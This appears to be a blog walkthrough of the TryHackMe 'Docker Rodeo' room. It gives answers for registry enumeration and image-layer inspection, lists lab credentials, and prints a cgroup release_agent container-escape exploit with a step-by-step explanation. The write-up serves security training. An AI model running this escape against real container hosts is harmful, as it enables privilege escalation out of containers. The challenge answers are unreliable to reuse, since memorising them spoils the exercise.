The Docker Rodeo TryHackme Writeup
By Shamsher khna This is a Writeup of Tryhackme room “The Docker Rodeo”
Room link: https://tryhackme.com/room/dockerrodeo
Note: This room is for Premium Members Only. who purchased THM premium membership.
Task 5. Interacting with a Docker Registry
Question 1. What is the port number of the 2nd Docker registry?
Answer: 7000
Question 2. What is the name of the repository within this registry?
We need to send a GET request to http://docker-rodeo.thm:7000/v2/_catalog to list all the repositories registered on the registry.
Answer: securesolutions/webserver
Question 3. What is the name of the tag that has been published?
Before we can begin analysing a repository, we need two key pieces of information:
1. The repository name
2. Any repository tag(s) published
We currently have the repository name (securesolutions/webserver) now we just need to list all tags that have been published. Every repository will have a minimum of one tag. This tag is the “latest” tag, but there can be many tags, all with different code, for example, major software versions or two tags for “production” and “development”.
Send a GET request to http://docker-rodeo.thm:7000/v2/repository/name/tags/list to query all published tags. For our application, our request would look like so: http://docker-rodeo.thm:7000/v2/securesolutions/webserver/tags/list
Answer: production
Question 4. What is the Username in the database configuration?
With these two important pieces of information about a repository known, we can enumerate that specific repository for a manifest file. This manifest file contains various pieces of information about the application, such as size, layers and other information. I’m going to grab the manifest file for the “notsecure” tag via the following GET request: http://docker-rodeo.thm:7000/v2/securesolutions/webserver/manifests/production
Answer: Admin
Question 5. What is the Password in the database configuration?
Answer:production_admin
Task 6. Vulnerability #2: Reverse Engineering Docker Images
Install Dive Tool
#wget https://github.com/wagoodman/dive/releases/download/v0.9.2/dive_0.9.2_linux_amd64.deb#sudo apt install ./dive_0.9.2_linux_amd64.deb
Challenge
Pull the challenge image using docker pull docker-rodeo.thm:5000/dive/challenge and apply what we have done above for the questions below.
Remember! You will need to use docker images to get the “IMAGE_ID” for the new image and use that with the dive command.
Question 1. What is the “IMAGE_ID” for the “challenge” Docker image that you just downloaded?
Answer: 2a0a63ea5d88
Question 2. Using Dive, how many “Layers” are there in this image?
Answer: 7
Question 2. What user is successfully added?
Answer: uogctf
Task 11. Vulnerability #7: Misconfigured Privileges (Deploy #2)
Connect to your new Instance using SSH with the following details:
New Instance IP: 10.10.22.173
SSH Port: 2244
Username: root
Password: danny
he code snippet below is based upon (but a modified) version of the Proof of Concept (PoC) created by Trailofbits where they detail the inner-workings to this exploit well.
1. mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x2. echo 1 > /tmp/cgrp/x/notify_on_release3. host_path=`sed -n ‘s/.*\perdir=\([^,]*\).*/\1/p’ /etc/mtab`4. echo “$host_path/exploit” > /tmp/cgrp/release_agent5. echo ‘#!/bin/sh’ > /exploit6. echo “cat /home/cmnatic/flag.txt > $host_path/flag.txt” >> /exploit7. chmod a+x /exploit8. sh -c “echo \$\$ > /tmp/cgrp/x/cgroup.procs”
Let’s briefly summarise what happens here:
- We need to create a group to use the Linux kernel to write and execute our exploit. The kernel uses “cgroups” to manage processes on the operating system since we have capabilities to manage “cgroups” as root on the host, we’ll mount this to “/tmp/cgrp” on the container.
- For our exploit to execute, we’ll need to tell Kernel to run our code. By adding “1” to “/tmp/cgrp/x/notify_on_release”, we’re telling the kernel to execute something once the “cgroup” finishes. (Paul Menage., 2004)
- We find out where the containers files are stored on the host and store it as a variable
- Where we then echo the location of the containers files into our “/exploit” and then ultimately to the “release_agent” which is what will be executed by the “cgroup” once it is released.
- Let’s turn our exploit into a shell on the host
- Execute a command to echo the host flag into a file named “flag.txt” in the container, once “/exploit” is executed
- Make our exploit executable!
- We create a process and store that into “/tmp/cgrp/x/cgroup.procs”
You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher
For more walkthroughs stay tuned…
Before you go…
Visit my other walkthrough’s:-
and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!
